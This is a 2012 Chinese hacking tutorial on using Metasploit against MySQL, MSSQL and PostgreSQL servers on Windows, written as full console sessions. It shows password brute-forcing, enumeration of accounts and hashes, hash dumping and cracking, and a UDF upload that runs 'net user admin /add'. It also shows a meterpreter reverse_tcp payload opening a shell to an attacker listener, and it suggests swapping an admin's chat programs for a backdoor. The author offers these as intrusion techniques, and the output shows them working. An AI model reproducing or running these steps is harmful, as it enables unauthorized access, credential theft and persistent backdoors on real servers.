首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
Metasploit 权限提升
来源:dis9.com 作者:dis9 发布时间:2012-03-12  

前言

其实这篇小说的名字改为WINDOWS环境的数据库攻击更好。。。。。。
  现在的入侵是越来越难了,人们的安全意识都普遍提高了不少,连个人用户都懂得防火墙,杀毒软件要装备在手,对于微软的补丁升级也不再是不加问津。因此现在我们想在因特网上扫描弱口令的主机已经几乎是痴心妄想了。(这可是一件大大的好事啊。)

  但是这也使得我们作黑客的进行入侵检测达到了一个前所未有的难度。通过各种手段,我们通常并不能直接获得一个系统的管理员权限。比如我们通过某些对IIS的攻击,只能获得IUSR-MACHINENAME的权限(如上传asp木马,以及某些溢出等)。这个帐号通常可是系统默认的guest权限,于是,如何拿到系统管理员或者是system权限,便显得日益重要了。

  于是,我就总结了一下大家所经常使用的几种提升权限的方法,以下内容是我整理的,没有什么新的方法,写给和我一样的菜鸟看的。高手们就可以略去了,当然,你要复习我不反对,顺便帮我查查有什么补充
恩,主要是针对数据库的。
如果对方没有你所能利用的服务,也可以替换对方管理员常用的程序,例如QQ,MSN等等,具体替换方法与替换服务一样,只是你的后门什么时候可以启动就得看你的运气了。
还有外部设备没说。。。。
还有改启动项木没说
好多好多懒得写了。。

Mysql数据库

首先得开启外联 WIndows

1
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'you password' WITH GRANT OPTION;

进行攻击

扫描一个主机

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
msf > use auxiliary/scanner/mysql/mysql_login
msf  auxiliary(mysql_login) > set RHOSTS 5.5.5.3
RHOSTS => 5.5.5.3
msf  auxiliary(mysql_login) > set USERNAME root
USERNAME => root
msf  auxiliary(mysql_login) > set PASS_FILE /pen/msf3/data/wordlists/postgres_default_pass.txt
PASS_FILE => /pen/msf3/data/wordlists/postgres_default_pass.txt
msf  auxiliary(mysql_login) > exploit
[*] 5.5.5.3:3306 MYSQL - Found remote MySQL version 5.5.16
[*] 5.5.5.3:3306 MYSQL - [1/7] - Trying username:'root' with password:''
[*] 5.5.5.3:3306 MYSQL - [1/7] - failed to login as 'root' with password ''
[*] 5.5.5.3:3306 MYSQL - [2/7] - Trying username:'root' with password:'root'
[*] 5.5.5.3:3306 MYSQL - [2/7] - failed to login as 'root' with password 'root'
[*] 5.5.5.3:3306 MYSQL - [3/7] - Trying username:'root' with password:'tiger'
[*] 5.5.5.3:3306 MYSQL - [3/7] - failed to login as 'root' with password 'tiger'
[*] 5.5.5.3:3306 MYSQL - [4/7] - Trying username:'root' with password:'postgres'
[*] 5.5.5.3:3306 MYSQL - [4/7] - failed to login as 'root' with password 'postgres'
[*] 5.5.5.3:3306 MYSQL - [5/7] - Trying username:'root' with password:'password'
[*] 5.5.5.3:3306 MYSQL - [5/7] - failed to login as 'root' with password 'password'
[*] 5.5.5.3:3306 MYSQL - [6/7] - Trying username:'root' with password:'admin'
[*] 5.5.5.3:3306 MYSQL - [6/7] - failed to login as 'root' with password 'admin'
[*] 5.5.5.3:3306 MYSQL - [7/7] - Trying username:'root' with password:'123456'
[+] 5.5.5.3:3306 - SUCCESSFUL LOGIN 'root' : '123456'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

查看结果:

1
2
3
4
5
6
7
8
9
10
11
msf  auxiliary(mysql_login) > creds 
 
Credentials
===========
 
host     port  user  pass    type      active?
----     ----  ----  ----    ----      -------
5.5.5.3  3306  root  123456  password  true
 
[*] Found 1 credential.
msf  auxiliary(mysql_login) >

查看信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
msf  exploit(ms10_018_ie_behaviors) > use auxiliary/admin/mysql/mysql_enum
msf  auxiliary(mysql_enum) > show options 
 
Module options (auxiliary/admin/mysql/mysql_enum):
 
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   RHOST                      yes       The target address
   RPORT     3306             yes       The target port
   USERNAME                   no        The username to authenticate as
 
msf  auxiliary(mysql_enum) > set PASSWORD 123456
PASSWORD => 123456
msf  auxiliary(mysql_enum) > set USERNAME root
USERNAME => root
msf  auxiliary(mysql_enum) > set RHOST 5.5.5.3
RHOST => 5.5.5.3
msf  auxiliary(mysql_enum) > exploit 
 
[*] Running MySQL Enumerator...
[*] Enumerating Parameters
[*]     MySQL Version: 5.5.16
[*]     Compiled for the following OS: Win32
[*]     Architecture: x86
[*]     Server Hostname: dis9team-a1
[*]     Data Directory: C:\xampp\mysql\data\
[*]     Logging of queries and logins: OFF
[*]     Old Password Hashing Algorithm OFF
[*]     Loading of local files: ON
[*]     Logins with old Pre-4.1 Passwords: OFF
[*]     Allow Use of symlinks for Database Files: YES
[*]     Allow Table Merge:
[*]     SSL Connection: DISABLED
[*] Enumerating Accounts:
[*]     List of Accounts with Password Hashes:
[*]         User: root Host: localhost Password Hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[*]         User: root Host: 127.0.0.1 Password Hash:
[*]         User:  Host: localhost Password Hash:
[*]         User: pma Host: localhost Password Hash:
[*]         User: root Host: % Password Hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[*]     The following users have GRANT Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: %
[*]     The following users have CREATE USER Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: %
[*]     The following users have RELOAD Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: %
[*]     The following users have SHUTDOWN Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: %
[*]     The following users have SUPER Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: %
[*]     The following users have FILE Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: %
[*]     The following users have PROCESS Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: %
[*]     The following accounts have privileges to the mysql database:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: %
[*]     Anonymous Accounts are Present:
[*]         User:  Host: localhost
[*]     The following accounts have empty passwords:
[*]         User: root Host: 127.0.0.1
[*]         User:  Host: localhost
[*]         User: pma Host: localhost
[*]     The following accounts are not restricted by source:
[*]         User: root Host: %
[*] Auxiliary module execution completed
msf  auxiliary(mysql_enum) > 

执行语句

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
msf  auxiliary(mysql_enum) > use auxiliary/admin/mysql/mysql_sql
msf  auxiliary(mysql_sql) > show options 
 
Module options (auxiliary/admin/mysql/mysql_sql):
 
   Name      Current Setting   Required  Description
   ----      ---------------   --------  -----------
   PASSWORD                    no        The password for the specified username
   RHOST                       yes       The target address
   RPORT     3306              yes       The target port
   SQL       select version()  yes       The SQL to execute.
   USERNAME                    no        The username to authenticate as
 
msf  auxiliary(mysql_sql) > set PASSWORD 123456
PASSWORD => 123456
msf  auxiliary(mysql_sql) > set RHOST 5.5.5.3
RHOST => 5.5.5.3
msf  auxiliary(mysql_sql) > set USERNAME root
USERNAME => root
msf  auxiliary(mysql_sql) > exploit 
 
[*] Sending statement: 'select version()'...
[*]  | 5.5.16 |
[*] Auxiliary module execution completed
msf  auxiliary(mysql_sql) > 

导出HASH

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
msf  auxiliary(mysql_sql) > use auxiliary/scanner/mysql/mysql_hashdump
msf  auxiliary(mysql_hashdump) > show options 
 
Module options (auxiliary/scanner/mysql/mysql_hashdump):
 
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   RHOSTS                     yes       The target address range or CIDR identifier
   RPORT     3306             yes       The target port
   THREADS   1                yes       The number of concurrent threads
   USERNAME                   no        The username to authenticate as
 
msf  auxiliary(mysql_hashdump) > set PASSWORD 123456
PASSWORD => 123456
smsf  auxiliary(mysql_hashdump) > set USERNAME root
USERNAME => root
msf  auxiliary(mysql_hashdump) > set RHOSTS 5.5.5.3
RHOSTS => 5.5.5.3
msf  auxiliary(mysql_hashdump) > exploit 
 
[+] Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] Saving HashString as Loot: root:
[+] Saving HashString as Loot: :
[+] Saving HashString as Loot: pma:
[+] Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] Saving HashString as Loot: dis9team:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[*] Hash Table has been saved: /home/brk/.msf4/loot/20120312075809_default_5.5.5.3_mysql.hashes_864135.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf  auxiliary(mysql_hashdump) > 

破解HASH

先看数据库的信息 木有木办法破解 必须先导出 工具是编译好的JOHN

1
2
3
4
5
6
7
8
9
10
msf  auxiliary(mysql_hashdump) > loot 
 
Loot
====
 
host     service  type          name                          content     info          path
----     -------  ----          ----                          -------     ----          ----
5.5.5.3  mysql    mysql.hashes  5.5.5.3-3306_mysqlhashes.txt  text/plain  MySQL Hashes  /home/brk/.msf4/loot/20120312075903_default_5.5.5.3_mysql.hashes_213052.txt
 
msf  auxiliary(mysql_hashdump) >

有了 直接破解

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
msf  auxiliary(mysql_hashdump) > use auxiliary/analyze/jtr_mysql_fast
msf  auxiliary(jtr_mysql_fast) > exploit 
 
[*] HashList: /tmp/jtrtmp20120312-29370-1ra46p8
[*] Trying 'mysql-fast' Wordlist: /tmp/jtrtmp20120312-29370-ojc089
[*] Output: No password hashes loaded (see FAQ)
[*] Trying 'mysql-fast' Rule: All4...
[*] Output: No password hashes loaded (see FAQ)
[*] Trying mysql-fast Rule: Digits5...
[*] Output: No password hashes loaded (see FAQ)
[*] 0 password hashes cracked, 0 left
 
[*] 0 hashes were cracked!
[*] Trying 'mysql-sha1' Wordlist: /tmp/jtrtmp20120312-29370-ojc089
guesses: 1  time: 0:00:00:00 DONE (Mon Mar 12 07:59:31 2012)  c/s: 480  trying: 123321 - 123456
Warning: passwords printed above might not be all those cracked
Use the "--show" option to display all of the cracked passwords reliably
[*] Output: Loaded 1 password hash (MySQL 4.1 double-SHA-1 [mysql-sha1 SSE2])
[*] Output: 123456           (root)
[*] Trying 'mysql-sha1' Rule: All4...
[*] Output: Loaded 1 password hash (MySQL 4.1 double-SHA-1 [mysql-sha1 SSE2])
[*] Output: No password hashes left to crack (see FAQ)
[*] Trying 'mysql-sha1' Rule: Digits5...
[*] Output: Loaded 1 password hash (MySQL 4.1 double-SHA-1 [mysql-sha1 SSE2])
[*] Output: No password hashes left to crack (see FAQ)
[*] root:123456:5.5.5.3:3306
 
[*] root:123456:5.5.5.3:3306
 
[*] dis9team:123456:5.5.5.3:3306
 
[*] 
 
[*] 3 password hashes cracked, 0 left
 
[*] 3 hashes were cracked!
[+] Host: 5.5.5.3 Port: 3306 User: root Pass: 123456
[+] Host: 5.5.5.3 Port: 3306 User: dis9team Pass: 123456
[*] Auxiliary module execution completed
msf  auxiliary(jtr_mysql_fast) >

数据库明文记录

1
2
3
4
5
6
7
8
9
10
11
12
msf  auxiliary(jtr_mysql_fast) > creds 
 
Credentials
===========
 
host     port  user      pass    type      active?
----     ----  ----      ----    ----      -------
5.5.5.3  3306  root      123456  password  true
5.5.5.3  3306  dis9team  123456  password  true
 
[*] Found 2 credentials.
msf  auxiliary(jtr_mysql_fast) > 

权限提升

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
msf  auxiliary(mysql_login) > use exploit/windows/mysql/mysql_payload
msf  exploit(mysql_payload) > set RHOST 5.5.5.3
RHOST => 5.5.5.3
msf  exploit(mysql_payload) > show options 
 
Module options (exploit/windows/mysql/mysql_payload):
 
   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   FORCE_UDF_UPLOAD  false            no        Always attempt to install a sys_exec() mysql.function.
   PASSWORD                           no        The password for the specified username
   RHOST             5.5.5.3          yes       The target address
   RPORT             3306             yes       The target port
   USERNAME          root             no        The username to authenticate as
 
Payload options (windows/meterpreter/reverse_tcp):
 
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     5.5.5.1          yes       The listen address
   LPORT     4444             yes       The listen port
 
Exploit target:
 
   Id  Name
   --  ----
   0   Automatic
 
msf  exploit(mysql_payload) > set PASSWORD 123456
PASSWORD => 123456
msf  exploit(mysql_payload) > exploit
[*] Started reverse handler on 5.5.5.1:4444
[*] Checking target architecture...
[*] Checking for sys_exec()...
[*] Checking target architecture...
[*] Checking for MySQL plugin directory...
[*] Target arch (win32) and target path both okay.
[*] Uploading lib_mysqludf_sys_32.dll library to C:/xampp/mysql/lib/plugin/CHlQoqQu.dll...
[*] Checking for sys_exec()...
[*] Command Stager progress -   1.47% done (1499/102246 bytes)
[*] Command Stager progress -   2.93% done (2998/102246 bytes)
[*] Command Stager progress -   4.40% done (4497/102246 bytes)
[*] Command Stager progress -   5.86% done (5996/102246 bytes)
[*] Command Stager progress -   7.33% done (7495/102246 bytes)
[*] Command Stager progress -   8.80% done (8994/102246 bytes)
[*] Command Stager progress -  10.26% done (10493/102246 bytes)
[*] Command Stager progress -  11.73% done (11992/102246 bytes)
[*] Command Stager progress -  13.19% done (13491/102246 bytes)
[*] Command Stager progress -  14.66% done (14990/102246 bytes)
[*] Command Stager progress -  16.13% done (16489/102246 bytes)
[*] Command Stager progress -  17.59% done (17988/102246 bytes)
[*] Command Stager progress -  19.06% done (19487/102246 bytes)
[*] Command Stager progress -  20.53% done (20986/102246 bytes)
[*] Command Stager progress -  21.99% done (22485/102246 bytes)
[*] Command Stager progress -  23.46% done (23984/102246 bytes)
[*] Command Stager progress -  24.92% done (25483/102246 bytes)
[*] Command Stager progress -  26.39% done (26982/102246 bytes)
[*] Command Stager progress -  27.86% done (28481/102246 bytes)
[*] Command Stager progress -  29.32% done (29980/102246 bytes)
[*] Command Stager progress -  30.79% done (31479/102246 bytes)
[*] Command Stager progress -  32.25% done (32978/102246 bytes)
[*] Command Stager progress -  33.72% done (34477/102246 bytes)
[*] Command Stager progress -  35.19% done (35976/102246 bytes)
[*] Command Stager progress -  36.65% done (37475/102246 bytes)
[*] Command Stager progress -  38.12% done (38974/102246 bytes)
[*] Command Stager progress -  39.58% done (40473/102246 bytes)
[*] Command Stager progress -  41.05% done (41972/102246 bytes)
[*] Command Stager progress -  42.52% done (43471/102246 bytes)
[*] Command Stager progress -  43.98% done (44970/102246 bytes)
[*] Command Stager progress -  45.45% done (46469/102246 bytes)
[*] Command Stager progress -  46.91% done (47968/102246 bytes)
[*] Command Stager progress -  48.38% done (49467/102246 bytes)
[*] Command Stager progress -  49.85% done (50966/102246 bytes)
[*] Command Stager progress -  51.31% done (52465/102246 bytes)
[*] Command Stager progress -  52.78% done (53964/102246 bytes)
[*] Command Stager progress -  54.24% done (55463/102246 bytes)
[*] Command Stager progress -  55.71% done (56962/102246 bytes)
[*] Command Stager progress -  57.18% done (58461/102246 bytes)
[*] Command Stager progress -  58.64% done (59960/102246 bytes)
[*] Command Stager progress -  60.11% done (61459/102246 bytes)
[*] Command Stager progress -  61.58% done (62958/102246 bytes)
[*] Command Stager progress -  63.04% done (64457/102246 bytes)
[*] Command Stager progress -  64.51% done (65956/102246 bytes)
[*] Command Stager progress -  65.97% done (67455/102246 bytes)
[*] Command Stager progress -  67.44% done (68954/102246 bytes)
[*] Command Stager progress -  68.91% done (70453/102246 bytes)
[*] Command Stager progress -  70.37% done (71952/102246 bytes)
[*] Command Stager progress -  71.84% done (73451/102246 bytes)
[*] Command Stager progress -  73.30% done (74950/102246 bytes)
[*] Command Stager progress -  74.77% done (76449/102246 bytes)
[*] Command Stager progress -  76.24% done (77948/102246 bytes)
[*] Command Stager progress -  77.70% done (79447/102246 bytes)
[*] Command Stager progress -  79.17% done (80946/102246 bytes)
[*] Command Stager progress -  80.63% done (82445/102246 bytes)
[*] Command Stager progress -  82.10% done (83944/102246 bytes)
[*] Command Stager progress -  83.57% done (85443/102246 bytes)
[*] Command Stager progress -  85.03% done (86942/102246 bytes)
[*] Command Stager progress -  86.50% done (88441/102246 bytes)
[*] Command Stager progress -  87.96% done (89940/102246 bytes)
[*] Command Stager progress -  89.43% done (91439/102246 bytes)
[*] Command Stager progress -  90.90% done (92938/102246 bytes)
[*] Command Stager progress -  92.36% done (94437/102246 bytes)
[*] Command Stager progress -  93.83% done (95936/102246 bytes)
[*] Command Stager progress -  95.29% done (97435/102246 bytes)
[*] Command Stager progress -  96.76% done (98934/102246 bytes)
[*] Command Stager progress -  98.19% done (100400/102246 bytes)
[*] Command Stager progress -  99.59% done (101827/102246 bytes)
[*] Command Stager progress - 100.00% done (102246/102246 bytes)
msf  exploit(mysql_payload) > sessions 
 
Active sessions
===============
 
No active sessions.
 
msf  exploit(mysql_payload) >

恩?

为什么没反映

了? 其实已经成功鸟=.= 远程链接数据库

 

执行 :

1
SELECT sys_exec('net user admin /add');

其实用户已经添加上去了

MSsql数据库

查看破解模块信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login
msf auxiliary(mssql_login) > info
 
       Name: MSSQL Login Utility
    Version: 7185
    License: Metasploit Framework License (BSD)
 
Provided by:
  MC 
 
Basic options:
  Name             Current Setting                                        Required  Description
  ----             ---------------                                        --------  -----------
  HEX2BINARY       /home/carlos/framework3/trunk/data/exploits/mssql/h2b  no        The path to the hex2binary script on the disk
  MSSQL_PASS                                                              no        The password for the specified username
  MSSQL_PASS_FILE                                                         no        A dictionary of passwords to perform a bruteforce attempt
  MSSQL_USER       sa                                                     no        The username to authenticate as
  RHOSTS                                                                  yes       The target address range or CIDR identifier
  RPORT            1433                                                   yes       The target port
  THREADS          1                                                      yes       The number of concurrent threads
 
Description:
  This module simply queries the MSSQL instance for a specific
  user/pass (default is sa with blank).

设置密码字典破解

1
2
3
4
5
6
7
8
9
10
11
12
msf auxiliary(mssql_login) > set MSSQL_USER meta
MSSQL_USER => meta
msf auxiliary(mssql_login) > set MSSQL_PASS_FILE /tmp/dict.txt
MSSQL_PASS_FILE => /tmp/dict.txt
msf auxiliary(mssql_login) > set RHOSTS 192.168.1.156
RHOSTS => 192.168.1.156
msf auxiliary(mssql_login) > run
 
[*] 192.168.1.156:1433 successful logged in as 'meta' with password 'meta'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mssql_login) >

查看MSSQL函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
msf auxiliary(mssql_login) > use auxiliary/admin/mssql/mssql_enum
msf auxiliary(mssql_enum) > set MSSQL_USER meta
MSSQL_USER => meta
msf auxiliary(mssql_enum) > set MSSQL_PASS meta
MSSQL_USER => meta
msf auxiliary(mssql_enum) > set RHOST 192.168.1.156
RHOST => 192.168.1.156
msf auxiliary(mssql_enum) > run
 
[*] Running MS SQL Server Enumeration...
[*] Auxiliary module execution completed
msf auxiliary(mssql_enum) > set MSSQL_PASS meta
MSSQL_PASS => meta
msf auxiliary(mssql_enum) > run
 
[*] Running MS SQL Server Enumeration...
[*] Version:
[*]     Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (Intel X86)
[*]             Jul  9 2008 14:43:34
[*]             Copyright (c) 1988-2008 Microsoft Corporation
[*]             Enterprise Edition on Windows NT 5.2  (Build 3790: Service Pack 2)
[*] Configuration Parameters:
[*]     C2 Audit Mode is Not Enabled
[*]     xp_cmdshell is Enabled
[*]     remote access is Enabled
[*]     allow updates is Not Enabled
[*]     Database Mail XPs is Not Enabled
[*]     Ole Automation Procedures are Not Enabled
[*] Databases on the server:
[*]     Database name:master
[*]     Databse Files for master:
[*]             C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\master.mdf
[*]             C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\mastlog.ldf
[*]     Database name:tempdb
[*]     Databse Files for tempdb:
[*]             C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\tempdb.mdf
[*]             C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\templog.ldf
[*]     Database name:model
[*]     Databse Files for model:
[*]             C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\model.mdf
[*]             C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\modellog.ldf
[*]     Database name:msdb
[*]     Databse Files for msdb:
[*]             C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\MSDBData.mdf
[*]             C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\MSDBLog.ldf
[*] System Logins on this Server:
[*]     sa
[*]     ##MS_SQLResourceSigningCertificate##
[*]     ##MS_SQLReplicationSigningCertificate##
[*]     ##MS_SQLAuthenticatorCertificate##
[*]     ##MS_PolicySigningCertificate##
[*]     ##MS_PolicyEventProcessingLogin##
[*]     ##MS_PolicyTsqlExecutionLogin##
[*]     ##MS_AgentSigningCertificate##
[*]     NT AUTHORITY\SYSTEM
[*]     NT AUTHORITY\NETWORK SERVICE
[*]     DBSQL2K801\Administrator
[*]     dangerlogin
[*]     meta
[*] Disabled Accounts:
[*]     sa
[*]     ##MS_PolicyEventProcessingLogin##
[*]     ##MS_PolicyTsqlExecutionLogin##
[*] No Accounts Policy is set for:
[*]     dangerlogin
[*]     meta
[*] Password Expiration is not checked for:
[*]     sa
[*]     ##MS_PolicyEventProcessingLogin##
[*]     ##MS_PolicyTsqlExecutionLogin##
[*]     dangerlogin
[*]     meta
[*] System Admin Logins on this Server:
[*]     sa
[*]     NT AUTHORITY\SYSTEM
[*]     NT AUTHORITY\NETWORK SERVICE
[*]     DBSQL2K801\Administrator
[*]     meta
[*] Windows Logins on this Server:
[*]     NT AUTHORITY\SYSTEM
[*]     NT AUTHORITY\NETWORK SERVICE
[*]     DBSQL2K801\Administrator
[*] Windows Groups that can logins on this Server:
[*]     No Windows Groups where found with permission to login to system.
[*] Accounts with Username and Password being the same:
[*]     meta
[*] Accounts with empty password:
[*]     No Accounts with empty passwords where found.
[*] Stored Procedures with Public Execute Permission found:
[*]     sp_replsetsyncstatus
[*]     sp_replcounters
[*]     sp_replsendtoqueue
[*]     sp_resyncexecutesql
[*]     sp_prepexecrpc
[*]     sp_repltrans
[*]     sp_xml_preparedocument
[*]     xp_qv
[*]     xp_getnetname
[*]     sp_releaseschemalock
[*]     sp_refreshview
[*]     sp_replcmds
[*]     sp_unprepare
[*]     sp_resyncprepare
[*]     sp_createorphan
[*]     xp_dirtree
[*]     sp_replwritetovarbin
[*]     sp_replsetoriginator
[*]     sp_xml_removedocument
[*]     sp_repldone
[*]     sp_reset_connection
[*]     xp_fileexist
[*]     xp_fixeddrives
[*]     sp_getschemalock
[*]     sp_prepexec
[*]     xp_revokelogin
[*]     sp_resyncuniquetable
[*]     sp_replflush
[*]     sp_resyncexecute
[*]     xp_grantlogin
[*]     sp_droporphans
[*]     xp_regread
[*]     sp_getbindtoken
[*]     sp_replincrementlsn
[*] Instances found on this server:
[*]     MSSQLSERVER
[*]     TESTINST
[*] Default Server Instance SQL Server Service is running under the privilege of:
[*]     NT AUTHORITY\NETWORK SERVICE
[*] Instance TESTINST SQL Server Service is running under the privilage of:
[*]     LocalSystem
[*] Auxiliary module execution completed
msf auxiliary(mssql_enum) >

取得权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > set LHOST 192.168.1.158
LHOST => 192.168.1.158
msf exploit(mssql_payload) > set RHOST 92.168.1.156
RHOST => 92.168.1.156
msf exploit(mssql_payload) > set MSSQL_USER meta
MSSQL_USER => meta
msf exploit(mssql_payload) > set MSSQL_PASS meta
MSSQL_PASS => meta
msf exploit(mssql_payload) > exploit
msf exploit(mssql_payload) > exploit
 
[*] Started reverse handler on port 4444
[*] Warning: This module will leave fGDpiveA.exe in the SQL Server %TEMP% directory
[*] Writing the debug.com loader to the disk...
[*] Converting the debug script to an executable...
[*] Uploading the payload, please be patient...
[*] Converting the encoded payload...
[*] Executing the payload...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.1.158:4444 -> 192.168.1.156:1708)
 
meterpreter > sysinfo

postgresql

暴力破解一个主机

1
2
msf > use auxiliary/scanner/postgres/postgres_login
msf  auxiliary(postgres_login) > 

字典等等已经设置好了 你可以默认也可以子机改
我直接运行了 我的密码都是 123456 =.=

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
msf  auxiliary(postgres_login) > exploit 
 
[*] 5.5.5.3:5432 Postgres - [01/14] - Trying username:'postgres' with password:'' on database 'template1'
[-] 5.5.5.3:5432 Postgres - Invalid username or password: 'postgres':''
[-] 5.5.5.3:5432 Postgres - [01/14] - Username/Password failed.
[*] 5.5.5.3:5432 Postgres - [02/14] - Trying username:'' with password:'' on database 'template1'
[-] 5.5.5.3:5432 Postgres - Invalid username or password: '':''
[-] 5.5.5.3:5432 Postgres - [02/14] - Username/Password failed.
[*] 5.5.5.3:5432 Postgres - [03/14] - Trying username:'scott' with password:'' on database 'template1'
[-] 5.5.5.3:5432 Postgres - Invalid username or password: 'scott':''
[-] 5.5.5.3:5432 Postgres - [03/14] - Username/Password failed.
[*] 5.5.5.3:5432 Postgres - [04/14] - Trying username:'admin' with password:'' on database 'template1'
[-] 5.5.5.3:5432 Postgres - Invalid username or password: 'admin':''
[-] 5.5.5.3:5432 Postgres - [04/14] - Username/Password failed.
[*] 5.5.5.3:5432 Postgres - [05/14] - Trying username:'postgres' with password:'postgres' on database 'template1'
[-] 5.5.5.3:5432 Postgres - Invalid username or password: 'postgres':'postgres'
[-] 5.5.5.3:5432 Postgres - [05/14] - Username/Password failed.
[*] 5.5.5.3:5432 Postgres - [06/14] - Trying username:'scott' with password:'scott' on database 'template1'
[-] 5.5.5.3:5432 Postgres - Invalid username or password: 'scott':'scott'
[-] 5.5.5.3:5432 Postgres - [06/14] - Username/Password failed.
[*] 5.5.5.3:5432 Postgres - [07/14] - Trying username:'admin' with password:'admin' on database 'template1'
[-] 5.5.5.3:5432 Postgres - Invalid username or password: 'admin':'admin'
[-] 5.5.5.3:5432 Postgres - [07/14] - Username/Password failed.
[*] 5.5.5.3:5432 Postgres - [08/14] - Trying username:'postgres' with password:'password' on database 'template1'
[-] 5.5.5.3:5432 Postgres - Invalid username or password: 'postgres':'password'
[-] 5.5.5.3:5432 Postgres - [08/14] - Username/Password failed.
[*] 5.5.5.3:5432 Postgres - [09/14] - Trying username:'postgres' with password:'admin' on database 'template1'
[-] 5.5.5.3:5432 Postgres - Invalid username or password: 'postgres':'admin'
[-] 5.5.5.3:5432 Postgres - [09/14] - Username/Password failed.
[*] 5.5.5.3:5432 Postgres - [10/14] - Trying username:'admin' with password:'password' on database 'template1'
[-] 5.5.5.3:5432 Postgres - Invalid username or password: 'admin':'password'
[-] 5.5.5.3:5432 Postgres - [10/14] - Username/Password failed.
[*] 5.5.5.3:5432 Postgres - [11/14] - Trying username:'postgres' with password:'123456' on database 'template1'
[+] 5.5.5.3:5432 Postgres - Logged in to 'template1' with 'postgres':'123456'
[+] 5.5.5.3:5432 Postgres - Success: postgres:123456 (Database 'template1' succeeded.)
[*] 5.5.5.3:5432 Postgres - Disconnected
[*] 5.5.5.3:5432 Postgres - [12/14] - Trying username:'' with password:'123456' on database 'template1'
[-] 5.5.5.3:5432 Postgres - Invalid username or password: '':'123456'
[-] 5.5.5.3:5432 Postgres - [12/14] - Username/Password failed.
